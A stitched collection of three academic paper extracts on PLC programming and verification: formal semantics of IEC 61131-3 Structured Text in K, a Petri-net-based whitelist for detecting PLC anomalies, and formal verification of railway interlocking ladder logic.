mechanism of PLC. digital sensors. The output module sends the command from the processor to actuators such as motors, relays, and so on. The most prominent feature of a PLC is the ``cyclic scan- ning'' execution mechanism which differs from that of a general-purpose computer. As shown in Figure 2, control programs are executed cyclically by the processor. First, the PLC samples physical signals from all input devices (e.g., sensors, switches) connected to the input module. Second, the PLC executes control programs to determine the output states. Third, the PLC updates the output states to actuators (e.g., robot, valves) connected to the output module. The three aforementioned steps comprise a scan cycle . B. IEC 61131-3 STRUCTURED TEXT LANGUAGE The IEC 61131-3 standard is a generally acknowledged inter- national standard, within which programming languages and basic software architecture for developing PLC programs are de ned. ST is a textual, high-level programming lan- guages de ned in IEC 61131-3. Similar to most modern high-level programming languages, ST provides the ability to develop applications with complex algorithms. Conse- quently, it is often the preferred language for developing large-scale applications. Program organization units (POUs) are the smallest soft- ware units from which PLC programs are built. They are at the bottom layer of the basic software model for PLC programs. The IEC 61131-3 standard de nes these three different POU types, in ascending order of functionality: Function . This type of POU has no static variables (without memory); that is, multiple invocations with the same input parameters always yield the same result. A function-type POU can be called by other POUs. Function block . This type of POU has static variables (with memory) and can have multiple instances each of which has a unique identi er. Multiple invocations with the same input paraments for a function block instance may yield different results. A function block-type POU 14594 VOLUME 7, 2019 Y. Huang et al. : KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Verification can be called only by function block-type or program- type POUs. Program . This type of POU represents the ``main pro- cedure'' and can access physical addresses, for instance, PLC inputs and outputs. A program-type POU can be called only by the PLC system. A PLC program written in ST consists of several POUs at least one of which is of the program type. In ST, every POU is a construct consisting of the declaration of variables and the body of statements list. Figure 3 shows an example of an ST program, it containing three POUs: a program-type POU prog, a function-type POU Addand a function block- type POU Counter . In line 10, prog declares an instance of Counter as an internal variable c. In line 15, prog invokes the function Addwith two INT variables: In1 and In2. FIGURE 3. An example of ST program. III. OVERVIEW OF OUR FORMALIZATION EFFORT This section presents the work ow of our formalization effort for the semantics of ST whose language speci cation for syntax and semantics is provided by the second edition of IEC 61131-3 [19]. This section also shows the role of for- malized semantics in the veri cation of PLC programs. Stef nescu et al. [21] argued that analysis tools for any real programming language should be developed based on formal semantics other than the informal speci cation of the language. On one hand, informal semantic speci cation may lead to different interpretations. On the other hand, veri - cation based on informal speci cation may prove incorrect properties or disprove correct properties because of the mis- interpretation of the semantics of the target programming languages [22]. The formalization of the semantics of ST is prompted by similar motivations. Our effort to establish formal semantics and its application in the veri cation of ST programs are presented in Figure 4. A. OVERVIEW This study targets the formal semantics of the ST language. Our formalization efforts are based on the language speci- cation provided by the second edition of the IEC 61131-3 standard [19]. The language speci cation is given in natural language and thus contains ambiguities, such as the use of FIGURE 4. Our formalization effort for the formal semantics of ST. the V AR_GLOBAL construct in program-type POUs. This ambiguity leads to different misinterpretations of the seman- tics of ST, impeding the development of automatic analysis tools for ST programs. As depicted in Figure 4, we formalized the semantics (called KST) from IEC 61131-3. KST is de ned in K, a rewriting-based semantic framework. KST consists of two parts: the syntax de ned in Backus-Naur Form and the semantics that is formalized into a collection of seman- tic rules. Moreover, KST covers other features de ned by IEC 61131-3, such as the particular programming con- cept for PLCs, and includes other features of PLC them- selves, such as the cyclic scanning execution mechanism (cf. Section II-A). Kprovides various built-in tools that allow the derivation of an interpreter for ST, rendering KST executable. To build con dence in executable semantics, of cial conformance test suits are ideal targets. However, no such test suit for ST thus far exists. IEC 61131-3 provides many examples to explain the semantics of constructs in ST. We then adopt these exam- ples as test cases to validate our KST formalization for ST. KST is also evaluated using hand-crafted programs to ensure high semantic coverage of KST. Figure 4 illustrates the role of formal semantics in the veri cation of ST programs. KST can be used beyond being a mere formal reference for ST. Moreover, a model checker is derived from KST with slightly increased effort by using built-in tools provided by K. We discuss the application of semantics in verifying their implementations (details are presented in Section V). IV. FORMALIZATION OF ST IN K A.Kframework Kis a rewriting-based programming language semantic framework. In K, the de nition of a programming language consists of two parts: the syntax and the semantics. The syntax is given in the form of conventional Backus-Naur Form . The semantics is de ned with rewrite rules (also called semantic rules) over con gurations. A con guration is a set of labeled, potentially nested units (called cells). It indicates the state of the running program and its execution context VOLUME 7, 2019 14595 Y. Huang et al. : KST: Executable Formal Semantics of IEC 61131-3 Structured Text for Verification FIGURE 5. The configuration of KST. such as memory, environment, and so on. A rewrite rule describes the one-step transition from one con guration to another. Formally, a rewrite rule is of the form C!C0, where CandC0are con gurations. If a rewrite rule matches the current con guration, this rule res and rewrites the cur- rent con guration as speci ed to its right-hand side (e.g., C0). Multiple rewrite rules can re at the same time. For improved understanding of rewrite rules, the following example is presented: X VVVT khX7!Li envhL7!Vi store hL7!Ti type:(1) There are four cells involved in (1), with the cell name as subscript. The ``'' in a cell is called the cell frame which denotes the content irrelevant to the rule. The horizontal line in a cell (e.g., in k) denotes a state transition, that is, if (1) res, parts of con guration above the line (i.e., X) will be rewritten as the content below the line (i.e., VVVT). Sematic rule (1) is taken from KST and describes how to lookup the value of a variable X. The kcell contains a list of computations to be executed, with the leftmost computation (also called the topcomputation) executed rst. The envcell represents the local environment and is constructed as a map from the variables to their storage locations. The store cell represents the storage and the type cell stores information concerning data types of storage locations. In K, cells that are not affected can be omitted. In (1), if the top computation is a variable lookup expression, then it will be replaced by ``V :: T'' that is an auxiliary representation of a value and its corresponding data type in KST. B. CONFIGURATION Figure 5 shows the con guration de ned in KST. Cells in the con guration store information concerning program con- structs and its execution context. For example, the pous cell contains a set of poucells, with each representing a POU. The symbol ``*'' appearing next to the poucell name denotes that multiple cells with the same name are allowed in the pous cell. Each poucell stores information about a POU, such as the name of POU (in pName ), declaration of variables (in pVars ), and statement list (in pStmts ). If the POU is of the function type, the data type of its return value is stored in the pRet cell; otherwise pRet remains empty (denoted by ``.K''). Some cells are used to record execution context. For example, the pidcell holds the identi er of the currently executed POU instance. Thestack cell represents the runtime stack, which contains a list of stack frame (denoted by ``sf()'' in KST).Theincell and outcell contain the input signal and output signal from/to devices connected to the PLC. After parsing, ST programs are processed in three phases (discussed in the following), and the current execution phase is stored into the phase cell. C. SYNTAX AND SEMANTICS Table 1 presents partial syntax of ST de ned in KST. The syntax is given in the form of Extended Backus- Naur Form (EBNF) according to the grammar de ned in IEC 61131-3 [19]. In Table 1, the option is represented through square brackets ``[ S ]'', which means zero or one occurrence of S. The closure is represented by curly braces ``{S}'', which means zero or more concatenations of S. For example, in syntax for variable declarations, ``[:= Constant]'' means that ``:= Constant'' may be present just once, or not at all, ``Id{, Id}'' denotes a single ``Id'' or a comma-separated ``Id'' sequence. After parsing, ST programs are processed in three phases in accordance with semantic rules. The work ow of KST is illustrated in Figure 6, where FC, FB, and PG represent a function-type POU, a function block-type POU, and a program-type POU, respectively. During each phase, cells in the con guration are populated or modi ed in accordance with semantic rules. Preprocessing phase . In this phase, KST traverses the
On_experimental_verification_of_model_based_white_list_for_PLC_anomaly_detection.pdf
Rece ntly, defensive countermeasures of controller are important because cyber -attacks on the control system are growing highly . This paper propose s an anomaly detection method of white list using PLC (Programmable Logic Controller ) as one of the countermeasures of controller. This paper introduces a white list design technique which models normal behaviors of field devices via Petri net and converts the white list model to ladder diagram. It allows PLC to detect the cyber -attack.
1 I. INTRODUCTION Recently, industrial control system s (ICSs) connect to the internet , PLC (Programmable Logic Controller ) is becoming network communication device introduces [1]. Accordingly , a number of the security incident s such as cyber - and virus -attacks have been reported so far [2][3] . Therefore, it is necessary to apply countermeasures to not only monitoring system and network device but also PLC . The formers are developed based on information security techniques bec ause ICS introduces Windows OS and TCP/IP based network to connect to the internet . On the other hand, the latter case is not the same as the former cases because the firmware of PLC is not always standardization. The previous study propose s an incident detection technique via Petri nets as one of the countermeasure s applicable for PLC [4]. This method focus es on the input -output of the field devices connecting to PLC . The detection method us es the anomaly behavior models which is modeled the field devices via Petri net. That model s can be regarded as pattern file s of black list type antivirus softs. The detection performance of the black list depend s on pattern file s and then requires frequent update of the pattern files to keep the high detection rate , while the black list allows us to identify the category of the security incident . Also , the CPU lo ad depends on the pattern file size when the system checks on the black list . The large size file affect adversely the real time processing performance of PLC, at worst, results in the anomaly behaviors of filed devices. This study focuses a detection method which is based on white list. Reference [5] propose s a white list targeting communications packet s in SCADA ( Supervisory Control And Data Acquisition ). Reference [6] propose s a white list target ing VoIP. These detection methods register the normal operation as lists and detect anomaly operation which is not registered at white list . This detection method does not need to update the list to keep the high detection rate. The CPU load due to check on the white list is lower than on the black list. The update timing of the white list is the system maintenance when the normal op eration of ICS is changed . Therefore , we apply the white list t o the PLC, and aim to detect security incident s appearing on the field device. It is expected that the white list allows PLC to detect the cyber -attack like the virus Stuxnet and PLC Bluster that change the part data of the control program by taking over the normal control command. In this study, we define the list which is registered the behavior of sensor and actuator as a white list. In the first, we model the normal operations via Petri net. Second, we convert the Petri net model to ladder diagram. Ladder diagram is one of the program language which is often used in programming PLC. This method app lies white list on the application program. Therefore, it can add the detection method to the PLC without regard to type of PLC . There are previous studies which propose the way to convert the Petri net model to the ladder diagram [7][8] . Reference [7] proposed the transform method to express the behavior of Petri net by ladder diagram. Converted ladder diagram by this previous study method have only event order information of Petri net. Therefore, it cannot detect the abnormal operations by converted ladder diagram. In this study, we propose the transform method to convert the Petri net model to ladder diagram with constraint condition of Petri net. In addition, we add the diagnostic function to the ladder diagram which diagnose whether the meeting constraint condition . Therefore, it can detect the incidents by ladder diagram. In the first, this paper describes the Petri net and ladder diagram. In the next, this paper proposes the transform method which can convert the Petri net model to ladder diagram. Finally, this paper shows the result of verification experiments. On Expe rimental Verification of Model B ased White list for PLC Anomaly D etection Akinori Mochizuki, K enji Sawada, S eiichi Shin, The University of Electro -Communications Shu Hosokawa, Control System Security Center * This work was supported by Council for Science, Technology and Innovation (CSTI), Cross -ministerial Strategic Innovation Promotion Program (SIP), Cyber -Security for Critical Infrastructure (funding agency: NEDO). Akinori Mochizuki is with The University of Electro -Communications, Tokyo, Japan (e -mail: akinori.m@ uec.ac.jp). Kenji Sawada is with The University of Electro -Communications, Tokyo, Japan (e -mail: knj.sawada @ uec.ac.jp). Shin Seiichi is with The University of Electro -Communications, Tokyo, Japan (e -mail: seiichi.shin @ uec.ac.jp). Shu Hosokawa is with Control System Security Center, Miyagi, Japan (e-mail: shu.hosokawa@css -center.or.jp). 2017 11th Asian Control Conference (ASCC) Gold Coast Convention Centre, Australia December 17-20, 2017 978-1-5090-1573-3/17/$31.00 2017 IEEE 1766 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. II. MODELING VIA PETRI NET A. Petri net Petri net is a modeling tool which can model the discrete event system [9]. Petri net is bipartite graph composing two nodes class: place and transition. These two nodes are connected by arc. Table I shows the formal definition of Petri net according to [10]. Table I. Formal definition of Petri net Petri net is a 5 -tupple, =( , , , , 0) where: ={ 1, 2, , } is a finite set of places, ={ 1, 2, ,t } is a finite set of transitions, ( ) ( ) is a set of arcs , : {1,2,3, } is a weight function, 0: {0,1,2,3, } is the initial marking, = and P . Petri net structu re =( , , , ) without any specific ini tial marking is denoted by . Petri net with the given initial marking is denoted by ( , 0). Petri nets have asynchronous and concurrency. In addition , Petri nets are applicable for modeling of dynamic state transitions. Therefore, it can visualize the incident dynamic state. The state of the system is represented by the number of tokens which occupy the Place. If the transition is fired, the tokens are removed from input place and ma rked in output place. A transition is enabled if each of its input places contains at least as many tokens as there are arcs from the place to the transition. Petri net model shows system behavior using this firing rule. Let x be a number of marking tokens . Then the following equation (1) is always satisfied. M is an arbitrary natural number s. Graphically, places are represented by circles, transitions by rectangles, arcs by directed arrows, and tokens by small solid circles. Fig. 1 shows the simplest Petri net model. It is necessary to define the meaning of transitions and place, when model the control system via Petri net. Fig.2 shows the self-loop. Self -loop means transition and place are connected by interactive arc. The transition which is connected self -loop can fire only when place has a token. Therefore, self -loop can limit the transition firing. In addition, there is an inhibitor arc that limit the transition firing. Fig. 3 shows the inhibitor arc. The transition whic h is connected inhibitor arc can fire only when connecting place has no tokens. B. Timed Petri net Timed Petri net is introduced time concept into the Petri net [11]. Time Petri nets (TPN) are classic Petri nets where each transition is associated with a time interval [ at, bt]. When transition becomes enabled, it cannot fire before at time units have elapsed, and it has to fire no later than bt time units after being enabled. Here at and bt are relative to the point in time when transition last became enabled. The time at is the earliest possible firing time for t ransition and is called earliest firing time of t ransition , and bt is the latest possible firing time for t and is called latest firing time of t ransition . The firing of a transitio n itself does not take up any time. This Timed Petri net can visualize the operation delay by introducing Timed Petri net. Fig. 4 shows the Timed Petri net model. C. The Reason Why t he Petri net Almost the control system is consist ed of field device, sensor and actuator. Therefore, it can be considered that behavior of sensor and actuator to be an actual movement of control system. Hence, if behavior of sensor and actuator can convert to the discrete time, it can model the actual movem ent of control system via Petri net. Previous study [4] considered the modeling FA (Factory Automation) via Petri net. D. The Example of Modeling In this study, as one example, we model the Ball -Sorter control system [10] as shown in Fig.5. The function of Ball-Sorter is sorting balls according to their weight as a normal operation . We use a ping -pong ball as a light ball, and a golf ball as a heavy ball. Fig. 6 shows the schematic of Ball-Sorter. Ball -Sorter has three air cylinders (Cylinder1, Cylinder2, and Cylinder3), one sorting sensor (S -sensor), and three proximity sensors (P -sensor1, P -sensor2, and P-sensor3). When the ball is a ping -pong ball, Ball -Sorter sort the ball to BOX1. When the ball is a golf ball, Ball -Sorter sort the ball to BOX2. M 0 (1) Fig. 1: Petri net Fig. 2: Self -loop Fig. 5: Appearance of Ball -Sorter system Fig. 4 : Timed Petri net Fig. 3: Inhibitor arc 1767 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. When model the Ball -sorter, we define that transition firing as ON/OFF operation of actuator and sensor. We m odel the Ball-Sorter so as to represent the event order in normal operation. Fig. 7 shows the Ball -Sorter Petri net model . Table. II and Table. II I shows the names and the meaning of transition and state in Fig. 7. III. LADDER DIAGRAM Ladder diagram is one of programming language that represent a program by a graphical diagram based on the circuit diagrams of relay logic hardware. This ladder diagram s used to develop software for PLC used in control system. Global standardization on PLC based on t he internatio nal standard IEC 61131 -3 is ongoing [1]. PLC based on this international standard can be programmed by FBD (Function Block Diagram), IL (Instruction List), and ST (Structured Text) not only ladder diagram. In this study, we use ladder diagram which is the most common program and FBD which can program the PLC not based on IEC 61131 -3 in most cases. Fig. 6: Schematic of Ball -Sorter control system Table II. Transition Transition Meaning behavior Psensor1_on P sensor1 turn ON Psensor2_on P sensor2 turn ON Psensor3_on P sensor3 turn ON Ssensor_off S sensor turn OFF Ssensor_on S sensor turn ON Cylinder1_on Air cylinder 1 turn ON Cylinder1_off Air cylinder 1 turn OFF Cylinder2_on Air cylinder 2 turn ON Cylinder2_off Air cylinder 2 turn OFF Cylinder3_on Air cylinder 3 turn ON Cylinder3_off Air cylinder 3 turn OFF Table III. Place Place Meaning of state buffer Buffer Cylinder1_on Air cylinder 1 ON state Cylinder1_off Air cylinder 1 OFF state Cylinder2_on Air cylinder 2 ON state Cylinder3_on Air cylinder 3 ON state Psensor1_on P sensor 1ON state Psensor2_on P sensor 2ON state Psensor3_on P sensor 3ON state Ssensor1_off S sensor OFF state Ssensor2_on S sensor ON state Fig. 7: Petri net model of Ball -Sorter [0,3] [0,3][0,3] [0,3] [0,3] [0,3] [0,3] [0,3][0, ] [0, ] [0, ]1768 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. IV. CONVERT THE PETRI NET TO LADDER D IAGRAM In this section, we propose the way to convert the Petri net model to ladder diagram with a constraint condition of Petri net. As normal operation of Petri net model, when the transition T fired, the marking token x in input place move to the output place following direction of arc F and weight function W. A transition t can fi re only when each input place p of t is marked with at least w (p, t) tokens. Therefore, when abnormal operation of based Petri net model like Fig. 1 is occurred, equation (1) is not satisfied as a result. When equation (1) is not satisfied, it can regard that the abnormal operation of control system is occur red. Accordingly, it can detect the abnormal operation by adding the diagnostic function which diagnose equation (1) not only converting the Petri net to structure ladder diagram. In the light of abnormal operation of self-loop like Fig. 2. This abnormal operation is the transition fire when the place which is connected to self -loop has no marking tokens. Therefore, to detect this abnormal operation by ladder diagram is need to add the diagnostic function which diagnostic the rule of self -loop. In the light of abnormal operation of the model using inhibitor arc like Fig. 3. A transition which is connected to inhibitor arc can fire only when an input place has no marking. Hence, abnormal operation of the model using inhibitor arc is that a transition which is connected to inhibitor arc is fired when an input place has no marking. Therefore, to detect this abnormal operation by ladder diagram is need to add the diagnostic function which diagnostic the rule of inhibitor arc. In the light of abnormal operation of Timed Petri net like Fig. 4. A transition in timed Petri net can fire after a specified Table IV. Petri net and Structuring Ladder Diagram Constructs Petri net Ladder Diagrams Based Petri net Self-loop Inhibitor arc Timed Petri net 1769 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. time between at and bt. Therefore, one of the abnormal operation s of timed Petri net is that firing time for transition is not between at and bt. To detect this abnormal operation by ladder diagram is need to add the diagnostic function which diagnostic the rule of timed Petri net. Table. IV shows the example of conversion from Petri net model to ladder diagram. ADD, SUB, LT, GT, EQ and TON are F B. ADD represent an adder. SUB represent a subtractor . LT, GT and EQ represent comparator >, <, =, respectively. TON is an ON delay timer . Number of marking tokens x is defined as integer . It is necessary to discretize input and output of sensor and actuator by using function which differentiate the rise of a signal like Fig. 8, because Petri net is a discrete -time model . Output of ladder diagram Attack is detection output of abnormal opera tion. Turning on the output Attack means that ladder diagram detects the abnormal operations. It can convert the Petri net model to ladder diagram following exa mple in Table. IV , because Petri net model which is shown in Fig. 7 is con stituted of example s in Table. IV. In this study, we converted the Petri net model shown in Fig. 7 to ladder diagram. Space did not permi t us to insert the converted ladder diagram V. EXPERIMENTAL VERIFICA TION In this section, we show the capability of PLC white list by experim ental verification. The experimental used the Ball-sorter shown in Fig. 5. A. Method There are various cyber -attacks m ethod targeting PLC such as propagating through a network or connecting directly . After all, these cyber -attacks make falsification of in ternal variable with PLC or illegal rewriting program. Therefore, w e carry out the following three experiments of normal operation and cyber -attack incident. Exp.(i): Normal operation (no cyber -attack) Exp.(ii): Abnormal output of actuator command Exp.(iii): Falsification of part of a program Normal operation in Exp.(i) is thrown in 4 balls. Table. V shows the ball sequence thrown in Ball -Sorter. In Table. V , P represents Ping -pong ball, and G represents Golf ball. Incident Exp. (ii) is caused by command from e ngineering device. Incident Exp. (iii) is falsification of ladder diagram to sort the golf ball to BOX1. B. Result Fig. 9 -11 shows the time series plot of abnormal output in Exp. (i) -(iv), respectively . Its vertical line shows the anomaly detection output , and the horizontal one the time. Taking anomaly detection output value 1 means that the system detects the abnormal operations. In Exp. (i), PLC did not detect the i ncident, because abnormal output did not take a value 1 in Fig. 9. In Exp. (ii), this result represents that PLC detected t he incident at the 5 second, because abnormal output took a value 1. In Exp. (iii), this result represents that PLC detected the incident at the 8 second, because abnormal output took a value 1. From the result of these experiments, we confirmed the effectiveness of the proposed detection method. Fig. 8: UP contact Table V. Ball sequence Input sequence 1 2 3 4 Ball P G P G Fig. 11: Exp.(iii) Falsification of part of a program Fig. 9: Exp.(i) Normal operation Fig. 10: Exp.(ii) Abnormal output of actuator command 1770 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply. C. A Load to The PLC In this study, we measured a load to the PLC by white list. Table. VI shows the load to the PL C with and without white list. The total number of steps means the number of lines in ladder diagram. Scan time means the amount of time it takes for the PLC to make one scan cycle. The scan cycle is the cycle of which the PLC gathers the inputs, runs a ladder diagram and then updates the outputs. VI. CONCLUSION We proposed the method to apply a detection function to PLC. PLC can have the white list by converting the Petri net model which is modeled the behavior of field device to a ladder diagram. In addition, we verify the capability of proposed detection function through the actual experiment. However, this study method is necessary to model the control system via Petri net manually. It is need the time and costs to model the complicated system. In future, it is necessary the method to model the control system automatically from the logs [12] . REFERENCES [1] http://www.plcopen.org/pages/tc1_standards/iec_61131_3/ [2] Stamatis Karno uskos: Stuxnet Worm Impact on Industrial Cyber -Physical System Security, IECON 2011, pp. 4490 -4494 (Nov. 2011) [3] Stephen McLaughlin, Charalambos Konstantinou: The Cybersecurity Landscape in Industrial Control Systems, Proceedings of the IEEE, Vol.104, No.5, pp. 1039 -1057 (May. 2016) [4] Akinori Mochizuki, Kenji Sawada, Seiichi Shin, Shu Hosokawa: Model -based security incident analysis for control systems via Petri net , AROB 22nd 2017, pp. 170 -175 (Jan. 2017) [5] Woo -suk Jung, Sung -Min Kim, Young -Hoon Goo, Myung -Sup Kim: Whitelist Representation for FTP Service in SCADA system by using Structured ACL Model, APNOMS 2016 18th Asia -Pacific, pp.1 -4 (2016) [6] Eric Y. Chen, Mistutaka Itoh: A Whitelist Approach to Protect SIP Servers from Flooding Attacks, CQR 2010, pp.1 -6 (June, 2010) [7] Shih Sen Peng, Meng Chu Zhou: Ladder Diagram and Petri -Net-Based Discrete -Event Control Design Methods, IEEE Transactions on Systems, Vol.34 523 -531 (2004) [8] M. Uzam, A.H. Jones, and N. Ajlouni: Conversion of Petri net controllers for manufactur ing systems into ladder logic diagrams, EFTA 96, pp.649 -655 (Nov. 1996) [9] T. Murata, Petri Nets: Properties, Analysis and Applications, Proceedings of the IEEE, vol. 77, no. 4, pp.541 -580 (1989) [10] T. Sasaki, A. Mochizuki, K. Sawada, S. Shin, S. Hosokawa: Mode l Based Fallback Control for Networked Control System via Switched Lyapunov Function , IEICE , Vol. E100.A No. 10 pp. 2086 -2094 (2017) [11] Popova -Zeugmann, Louchka. "Timed petri nets." Time and Petri Nets. Springer Berlin Heidelberg, pp.139 -172, (2013) [12] Shingo Ab e, Yohei Tanaka, Yukako Uchida and Shinichi Horata : Tracking Attack Sources based on Traceback Honeypot for ICS Network , SICE Annual Conference 2017 , pp.717 -723, (2017) Table VI. The PLC load Without white list With white list Program size 234.071kB 235.712kB Occupancy rate of program memory 4.23% 4.26% Object size 1.496kB 3.248kB Occupancy rate of object memory 0.04% 0.08% The total number of steps 39 144 Maximum scan time 0.40ms 0.40ms Minimum scan time 0.27ms 0.28ms 1771 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:39 UTC from IEEE Xplore. Restrictions apply.
Formal_Methods_for_Industrial_Interlocking_Verification.pdf
In this paper, we present an overview of research jointly undertaken by the Swansea Railway Veri cation Group towards veri cation techniques for automatically checking safety for train control systems. We present a comprehensive modelling of safety principles in rst order logic. We conclude by applying veri cation methods developed by Swansea Railway Veri cation Group in order to check the modelled safety principles against a real world railway interlocking system.
Formal Methods for Industrial Interlocking Veri cation Simon Chadwick Siemens Rail Automation UK Chippenham, UK [email protected] James Computer Science Swansea University Swansea, UK [email protected] Roggenbach Computer Science Swansea University Swansea, UK [email protected] Werner Siemens Rail Automation UK Chippenham, UK [email protected] Index Terms Veri cation; Model-Checking; PLC; Formal Methods in Industry. I. I NTRODUCTION In 2004, the 18th IFIP World Computer Congress identi ed the railway domain as a Grand Challenge of Computing Science because it is of immediate concern and as it provides a set of generic, well-understood problems whose solutions would be transferable to various other application domains, e.g., process control in manufacturing, a.k.a. industry 4.0. A major challenge in the railway domain concerns the veri cation of safety critical components. Here, in particular the so-called interlocking computer plays a signi cant role as it provides essential safety functions for railway signalling. Described in terms of theoretical computer science, an interlocking computer is a relatively simple entity: it can be modelled as a nite automaton, a concept established in the 1960 s; and it can be analyzed through using temporal logic to express safety properties and then applying the technique of model-checking, which as a eld have both been actively researched since the 1980 s. In this paper, we provide proof of concept that these three elds have matured enough to be utilized in an industrial setting. Here, we focus on the challenge of how to make relevant safety properties accessible for model-checking. This is a process that requires the de nition of a bespoke rst order temporal logic. Relative to this logic, we can justify why our veri cation process is correct. Further, we discuss some results that we achieved in a technology transfer project between academics from Swansea University and railway engineers from Siemens Rail Automa- tion UK. This work has been supported by Siemens Rail Automation UK.II. B ACKGROUND An interlocking provides a safety layer for a railway. It interfaces with both the physical track layout and the human (or computerised) controller. The controller issues requests, such as to set a route. Upon such a request, the interlocking will determine if it is safe for the operation to be permitted. If it is safe then the interlocking will issue requests to change the physical track layout, informing the controller of the change. Whereas if it is unsafe, the interlocking will not allow the physical track layout to be changed, and will report back to the controller that the operation has not taken place as it would yield an unsafe situation. Here, we consider TrackGuard WestraceTMinterlockings that execute the following typical control ow: initialise while True do read (Input) (*) State <- Program(Input, State) write (Output) & State <- State After initialisation, there is a non terminating loop con- sisting of three steps: (1) Reading of Input , where Input includes requests from signallers and data from physical track sensors; (2) Internal processing: this depends on the Input as well as on the current State of the controller; Using these the next state State is computed. (3) Committing of Output , which includes passing information back to the signaller, commands to change the physical track layout, as well as an update of the State of the controller. Thus, a TrackGuard WestraceTMinterlocking follows the design principles of a so- called Programmable Logic Controller (PLC). In the context of TrackGuard WestraceTMinterlockings, Input ,Output ,State , and State are sets of Boolean variables, where Output is a subset of State . The current con guration of the controller is given by the values of all variables in the sets Input andState . The process step then depends on the current con guration . The TrackGuard WestraceTMinterlocking realises this controller in hardware, where the steps initialise andprocess depend on the installed control software written in ladder logic. A ladder logic program can be translated into a subset of propositional logic. This translation is straightforward: it 978-1-5386-7528-1/18/$31.00 2018 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:28 UTC from IEEE Xplore. Restrictions apply. replaces graphical symbols by logical operators, a process which has been automated in [4]. For the rest of the paper we only deal with this representation in propositional logic. III. C APTURING SAFETY PRINCIPLES USING TEMPORAL FIRST ORDER LOGIC In order to perform veri cation of ladder logic programs provided by Siemens, we were required to de ne a set of safety properties. These safety properties describe restrictions in terms of generic elements of the track plan in order to assure some aspect of safety in the system. Each ladder logic program prescribes certain state transi- tions, which relate to real-world actions in the railway system. When implemented for a concrete ladder logic program, each safety property places a restriction on the set of state transitions. The veri cation process will be to check if the state transitions prescribed by the ladder logic program are allowed by the safety property. In order to formulate safety properties, we used a publicly available standards document, Interlocking Principles [5], as the basis for the formation of the safety conditions that will be used in this project. With consideration of the case studies that Siemens Rail Automation UK were providing, it was decided to select a subset of the safety properties in this document for use in our veri cation approaches. Each reference is given as a statement in plain English about the conditions that must hold before a movement authority can be granted. The meanings of the terms used in these statements are detailed in the main body of the Interlocking Principles document. A. A Note on Naming Conventions While the elements of each property are detailed in the body of the Interlocking Principles document, the safety behaviour that is being examined by each reference is open to interpretation. Because of this, further discussion with Siemens Rail Automation UK engineers was required in order to trans- late these English language conditions into observable state transitions within the format of their ladder logic programs. With the understanding gained from our discussions with Siemens Rail Automation UK, it was possible to describe the English safety properties in terms of ladder logic variables. Since these properties are generic, in order to carry out ver- i cation of a particular track layout and ladder logic program each safety property needs to be converted from its generic form into a concrete instance. Rather than describing the conditions in a general sense, the concrete forms of the safety properties describe actual elements of the track plan, using the variable names that appear in the ladder logic program. To perform this translation from English references into concrete safety properties, a table of variable names was established in order to substitute speci c variables for the generic elements such as route , signal , or point . This process has the effect of generating many different formulas for a single safety property reference in the table, because a generic route description in English will relate to a number of physical routes in the track plan, each requiringtheir own implementation of the safety property. For example, All train detection devices in the route indicate the line is clear , describes a generic route element in the track plan, and the concept of devices on this route indicating clear. When implementing this safety property for our case study, which contains seven Main class routes, seven propositional formula are required, each describing the safety property in the context of a particular route. B. A Temporal FOL with Built-in Predicates The rst step for implementing concrete safety proper- ties involves moving from English language descriptions of properties as they appear in Interlocking Principles into intermediate generic temporal rst order logic formulae [5]. To describe the original English safety properties in a generic way, we employ a many sorted rst order logic over states and their successors. We consider models at a point of time as: Models :pairs (T;I) whereTis a track plan and Iis a propositional model for all propositional variables of T, e.g.I(P106:RL ) =true=false . In these models, the track plan Tcontains topological information on the railway section, such as the names of all track elements for example Signals, RouteNames, Points, and TrackSegments. It also contains information regarding the layout of these elements, such as which RouteNames originate at which Signal. Thus, the track plan T corresponds to the combination of a visual track layout, labelled with element names, and a route table that describes route and signal information. This topological information does not change over time. The set of propositional variables in Iwould then be formed by the application of variable naming conventions to the track elements in T. These models will be given to us through the execution of the ladder logic programs, with each cycle giving a new model. By looking at subsequent execution cycles of the ladder logic program, from states s0;s1;:::, we can then form se- quences of models that each correspond to a single state of the variables within the ladder logic program. (T;I 0);(T;I 1);::: We then introduce a signature containing: 4 sorts, 3 functions, and unary and binary predicates. Sorts are interpreted in the track plan, for example: Signal T=fS100;:::g:iffT has signals S 100;::: Functions are interpreted in the track plan, for example: routesOf T(s) =fr1;:::;r ng iffin T; signal s has routes r 1;:::;r n Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:28 UTC from IEEE Xplore. Restrictions apply. Unary and binary predicates are interpreted in the track plan for example: p isInCorrectPositionFor T;Ir holds iff Case 1: inT,pneeds to be in reverse for randI (p:RL ) is true. Case 2: ] inT,pneeds to be in normal for r and I(p:NL )is true. The unary predicates take an element of a sort as an argument. When instantiated with an element from a sort, the unary predicates interpretation is similar to that of Boolean variables within the ladder logic program. For example, the unary predicate proceed (< Signal > )could be interpreted using a physical signal, say S100. The truth value of this unary predicate is then dependent of the value of the signal in a speci c state. In the ladder logic program, there will be a corresponding Boolean variable that will eventually be used for the interpretation of this predicate. Each unary predicate and argument combination matches a single variable name within the ladder logic, such that the generic formula can be substituted for these variable names at a later stage to produce a concrete formula. In our example signal S100, the corresponding signal proceed variable in the ladder logic is found to be S100.G . In addition to unary predicates, a number of binary pred- icates were also de ned. These binary predicates are solely used to relate Points to RouteNames, and are required due to the unique naming scheme used by points within the ladder logic. When describing the naming of points, in many variable classes, the orientation of the point in uences the pre x or suf x that is used, i.e. whether the point should be in normal or reverse position. Since the required point orientation is information that is state dependent, interpreting a predicate with a track plan T is not suf cient. Instead, these binary predicates must be interpreted using some propositional model I, in which the required point orientations may be evaluated. The required Point orientation will be one of two cases shown in the binary predicate de nition. With the de ned 